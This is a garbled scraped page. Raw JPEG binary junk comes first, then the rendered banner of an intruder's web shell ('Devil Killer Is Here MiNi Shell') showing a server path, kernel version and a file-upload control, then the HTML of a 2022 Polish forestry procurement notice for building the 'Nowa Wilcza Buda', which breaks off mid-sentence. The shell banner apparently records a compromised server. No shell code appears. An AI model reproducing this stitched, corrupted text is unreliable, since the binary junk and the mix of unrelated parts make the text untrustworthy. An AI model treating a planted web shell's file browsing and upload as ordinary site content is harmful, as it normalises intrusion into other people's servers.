JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220614/0020792401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa Nowej Wilczej Budy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Kup</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 530560272</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1 Maja 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kup</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-082</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">774695212</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">774695353</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kup@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://kup.katowice.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Prowadzenie gospodarki leśnej </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa Nowej Wilczej Budy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fb6f02ec-e8af-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00207924</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00177709/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa Nowej Wilczej Budy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Postępowanie prowadzone jest w języku polskim. 2. Komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu platformy przetargowej JOSEPHINE<br/>https://josephine.proebiz.com/pl/ oraz poczty elektronicznej: kup@katowice.lasy.gov.pl z<br/>zastrzeżeniem, że składanie ofert oraz oświadczeń, odbywa się wyłącznie poprzez platformę<br/>JOSEPHINE.3. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie<br/>zamówienia publicznego, musi się zarejestrować platformie JOSEPHINE dostępnej pod adresem<br/>internetowym https://josephine.proebiz.com/pl/ .4. Wymagania techniczne i organizacyjne<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej za pomocą platformy JOSEPHINE,<br/>zostały opisane na stronie https://josephine.proebiz.com/pl/ oraz stronie internetowej:<br/>https://store.proebiz.com/docs/josephine/pl/Wymagania_techniczne_sw_JOSEPHINE.pdf .Sposób<br/>sporządzenia, wysyłania i odbierania korespondencji elektronicznej musi być zgodny z wymaganiami<br/>określonymi w rozporządzeniu wydanym na podstawie art. 70 PZP.5. Wykonawca, przystępując do<br/>niniejszego postępowania o udzielenie zamówienia akceptuje warunki korzystania z platformy<br/>JOSEPHINE.6. Wykonawca może zwrócić się do zamawiającego za pośrednictwem platformy<br/>JOSEPHINE lub na adres email: kup@katowice.lasy.gov.pl z wnioskiem o wyjaśnienie treści SWZ.<br/>Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed terminem składania<br/>ofert ( udostępniając je na platformie przetargowej), pod warunkiem że wniosek o wyjaśnienie treści<br/>SWZ wpłynął do zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert. W<br/>przypadku gdy wniosek o wyjaśnienie treści SWZ nie wpłynie w terminie, zamawiający nie ma<br/>obowiązku udzielania wyjaśnień SWZ oraz przedłużenia terminu składania ofert. Przedłużenie terminu<br/>składania ofert nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści SWZ.7. Przyjmuje<br/>się, że dokument wysłany przy użyciu Platformy przetargowej został doręczony Wykonawcy w sposób<br/>umożliwiający zapoznanie się z jego treścią, w dniu jego przekazania na Platformę przetargową.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:• administratorem Pani/Pana danych osobowych jest<br/>Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Kup, ul. 1 Maja 9, 46-082 Kup;• w<br/>sprawach związanych z Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony Danych, za<br/>pomocą, poczty elektronicznej na adres e-mail: iod@comp-net.pl;• Pani/Pana dane osobowe<br/>przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego<br/>postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich<br/>przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień<br/>publicznych spoczywający na Zamawiającym;• odbiorcami Pani/Pana danych osobowych będą osoby<br/>lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art.<br/>74 ustawy Pzp;Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania<br/>umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;• obowiązek<br/>podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp;• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;• Posiada Pan/Pani:− na podstawie art. 15 RODO<br/>prawo dostępu do danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO prawo do<br/>sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz<br/>nie może naruszać integralności protokołu oraz jego załączników.− na podstawie art. 18 RODO prawo<br/>żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania<br/>nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne<br/>względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia.−<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;• nie przysługuje<br/>Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;−<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.2. Jednocześnie<br/>Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14<br/>RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z<br/>prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział<br/>w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14<br/>ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 140755,53 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa wolnostojącego, parterowego, niepodpiwniczonego obiektu gospodarki leśnej na wzór rozebranego obiektu o konstrukcji drewnianej na działce ewidencyjnej nr 112 KM4, obręb 0391 – Dąbrówka Dolna, gmina Pokój. <br/>Obiekt składa się z monolitycznych żelbetowych ław, ścian fundamentowych oraz nadziemnej konstrukcji ścian zewnętrznych i dachu w technologii drewnianej z uwypukleniem walorów zabytkowych, historycznych zmierzających do trwałego odtworzenia rozebranej budowli.<br/>Do wybudowania jest obiekt gospodarki leśnej nieposiadający instalacji i stolarki okiennej oraz drzwiowej w ścianach zewnętrznych. <br/>Podstawowe roboty budowlane polegają na budowie: <br/>▪ wolnostojący, niepodpiwniczony, parterowy obiekt o wymiarach zewnętrznych: (długość × szerokość × wysokość w kalenicy) = 10,49m × 5,89 × 6,05m, <br/>▪ utwardzonego dojścia do budynku, o wymiarach (długość × szerokość) = 5,00m × 2,50m, <br/>▪ utwardzonego miejsca do ustawienia tablicy pamiątkowej o wymiarach (długość × szerokość) = 5,00m × 2,50m, <br/>▪ utwardzonego miejsca do czasowego gromadzenia i segregacji odpadów stałych, z możliwością ich segregacji, o wymiarach 1,50m × 1,00m. <br/><br/>Teren nie wymaga ogrodzenia, placów postojowych i budowy urządzeń do oczyszczenia lub gromadzenia ścieków.<br/>Budowany obiekt jest wolnostojący, niepodpiwniczony, parterowy, jednoizbowy posadowiony na żelbetowych ławach i ścianach fundamentowych. Ściany zewnętrzne i szczytowe stanowi drewniana konstrukcja słupowa oparta na podwalinie, zwieńczona oczepem w poziomie więźby drewnianej oraz usztywniona w otworach okiennych i drzwiowych. Słupy konstrukcyjne od zewnątrz obłożone są drewnianymi półbalami, od wewnątrz deskami. Dach drewniany jest dwuspadkowy o konstrukcji krokwiowo-jętkowej oparty na belkach oczepu z pokryciem z desek. Jednoizbowe pomieszczenie wyposażono w meble z ławkami ustawionymi na podłodze z kruszywa kamiennego.<br/>Zakłada się wykorzystanie rozebranych belek z dawnej Wilczej Budy jako elementy nadproży okiennych i belek/desek podokiennych zgodnie z projektem. Wykonawca zobowiązany jest na własny koszt do przetransportowania i przygotowania do wbudowania starych belek, które złożone są w siedzibie Nadleśnictwa Kup. Przygotowanie do wbudowania będzie polegało na usunięciu części zgnitej, przycięciu na wymiar i zaimpregnowaniu. W przypadku braku możliwości wbudowania starych belek za zgodą Zamawiającego Wykonawca zamontuje elementy nowe. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <p class="mb-0">45261000-4 - Wykonywanie pokryć i konstrukcji dachowych oraz podobne roboty</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45112700-2 - Roboty w zakresie kształtowania terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania oraz spełniają warunki udziału w postępowaniu określone przez zamawiającego w ogłoszeniu i niniejszej SWZ. Zamawiający wymaga wykazania przez wykonawcę spełniania warunku określonego w art. 112 ust. 2 PZP dotyczącego<br/>1.1.Zdolności do występowania w obrocie gospodarczym i uprawnień do prowadzenia określonej działalności zawodowej:<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie<br/>1.2.Sytuacji ekonomicznej lub finansowej. <br/>Zamawiający uzna, że Wykonawca jest w sytuacji ekonomicznej i finansowej jeśli wykaże że:<br/>•	dysponuje środkami finansowymi lub zdolnością kredytową – w kwocie nie mniejszej niż: 100 000,00 zł<br/>•	posiada polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 200 000,00 zł ważną przez cały okres obowiązywania umowy lub odnawianą w trakcie trwania umowy.<br/><br/>1.3	Zdolności technicznej lub zawodowej – w zakresie:<br/>1.3.1. Posiadania wiedzy i doświadczenia ;<br/>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia, jeżeli w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres działalności jest krótszy, w tym okresie), Wykonawca składający ofertę wykaże, że:<br/>1)	zrealizował przynajmniej dwie oddzielne roboty budowlane polegające na budowie, przebudowie lub remoncie budynku za kwotę nie mniejszą niż 100 000,00 zł brutto każda z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów na rzecz których roboty zostały wykonane i załączy dokumenty potwierdzające, że roboty te zostały wykonane należycie. <br/>1.3.2.Dysponowania osobami zdolnymi do wykonania zamówienia;<br/>Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli wykaże: <br/>1) dysponowanie kierownikiem budowy posiadającym uprawnienia budowlane, bez ograniczeń, w specjalności konstrukcyjno-budowlanej, <br/>1.3.3.Dysponowania potencjałem technicznym;<br/>	Nie dotyczy <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym Wykonawca, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. – załącznik nr 9 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w zakresie pkt 5.2.1. składa każdy z Wykonawców wspólnie ubiegających się o zamówienie<br/>2. Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury, wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się powyższych dokumentów, lub gdy dokumenty te nie odnoszą się do wszystkich przypadków zgodnie z powyższym, zastępuje się je w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczeniem osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Wyżej wymienione terminy wystawienia stosuje się.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych ( zgodnie z pkt 1.3.1 Dział XV SWZ) w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 5 lat przed upływem terminu do składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów na rzecz których roboty zostały wykonane i załączy dokumenty potwierdzające, że roboty te zostały wykonane należycie.. /załącznik nr 6 do SWZ/. Oferent winien załączyć dokumenty (dowody) potwierdzające że roboty zostały wykonane z należytą starannością. Wymaga się, aby Oferent zrealizował przynajmniej dwie oddzielne roboty budowlane polegające na budowie, przebudowie lub remoncie budynku za kwotę nie mniejszą niż 100 000,00 zł brutto każda. Dowodami, o których mowa powyżej 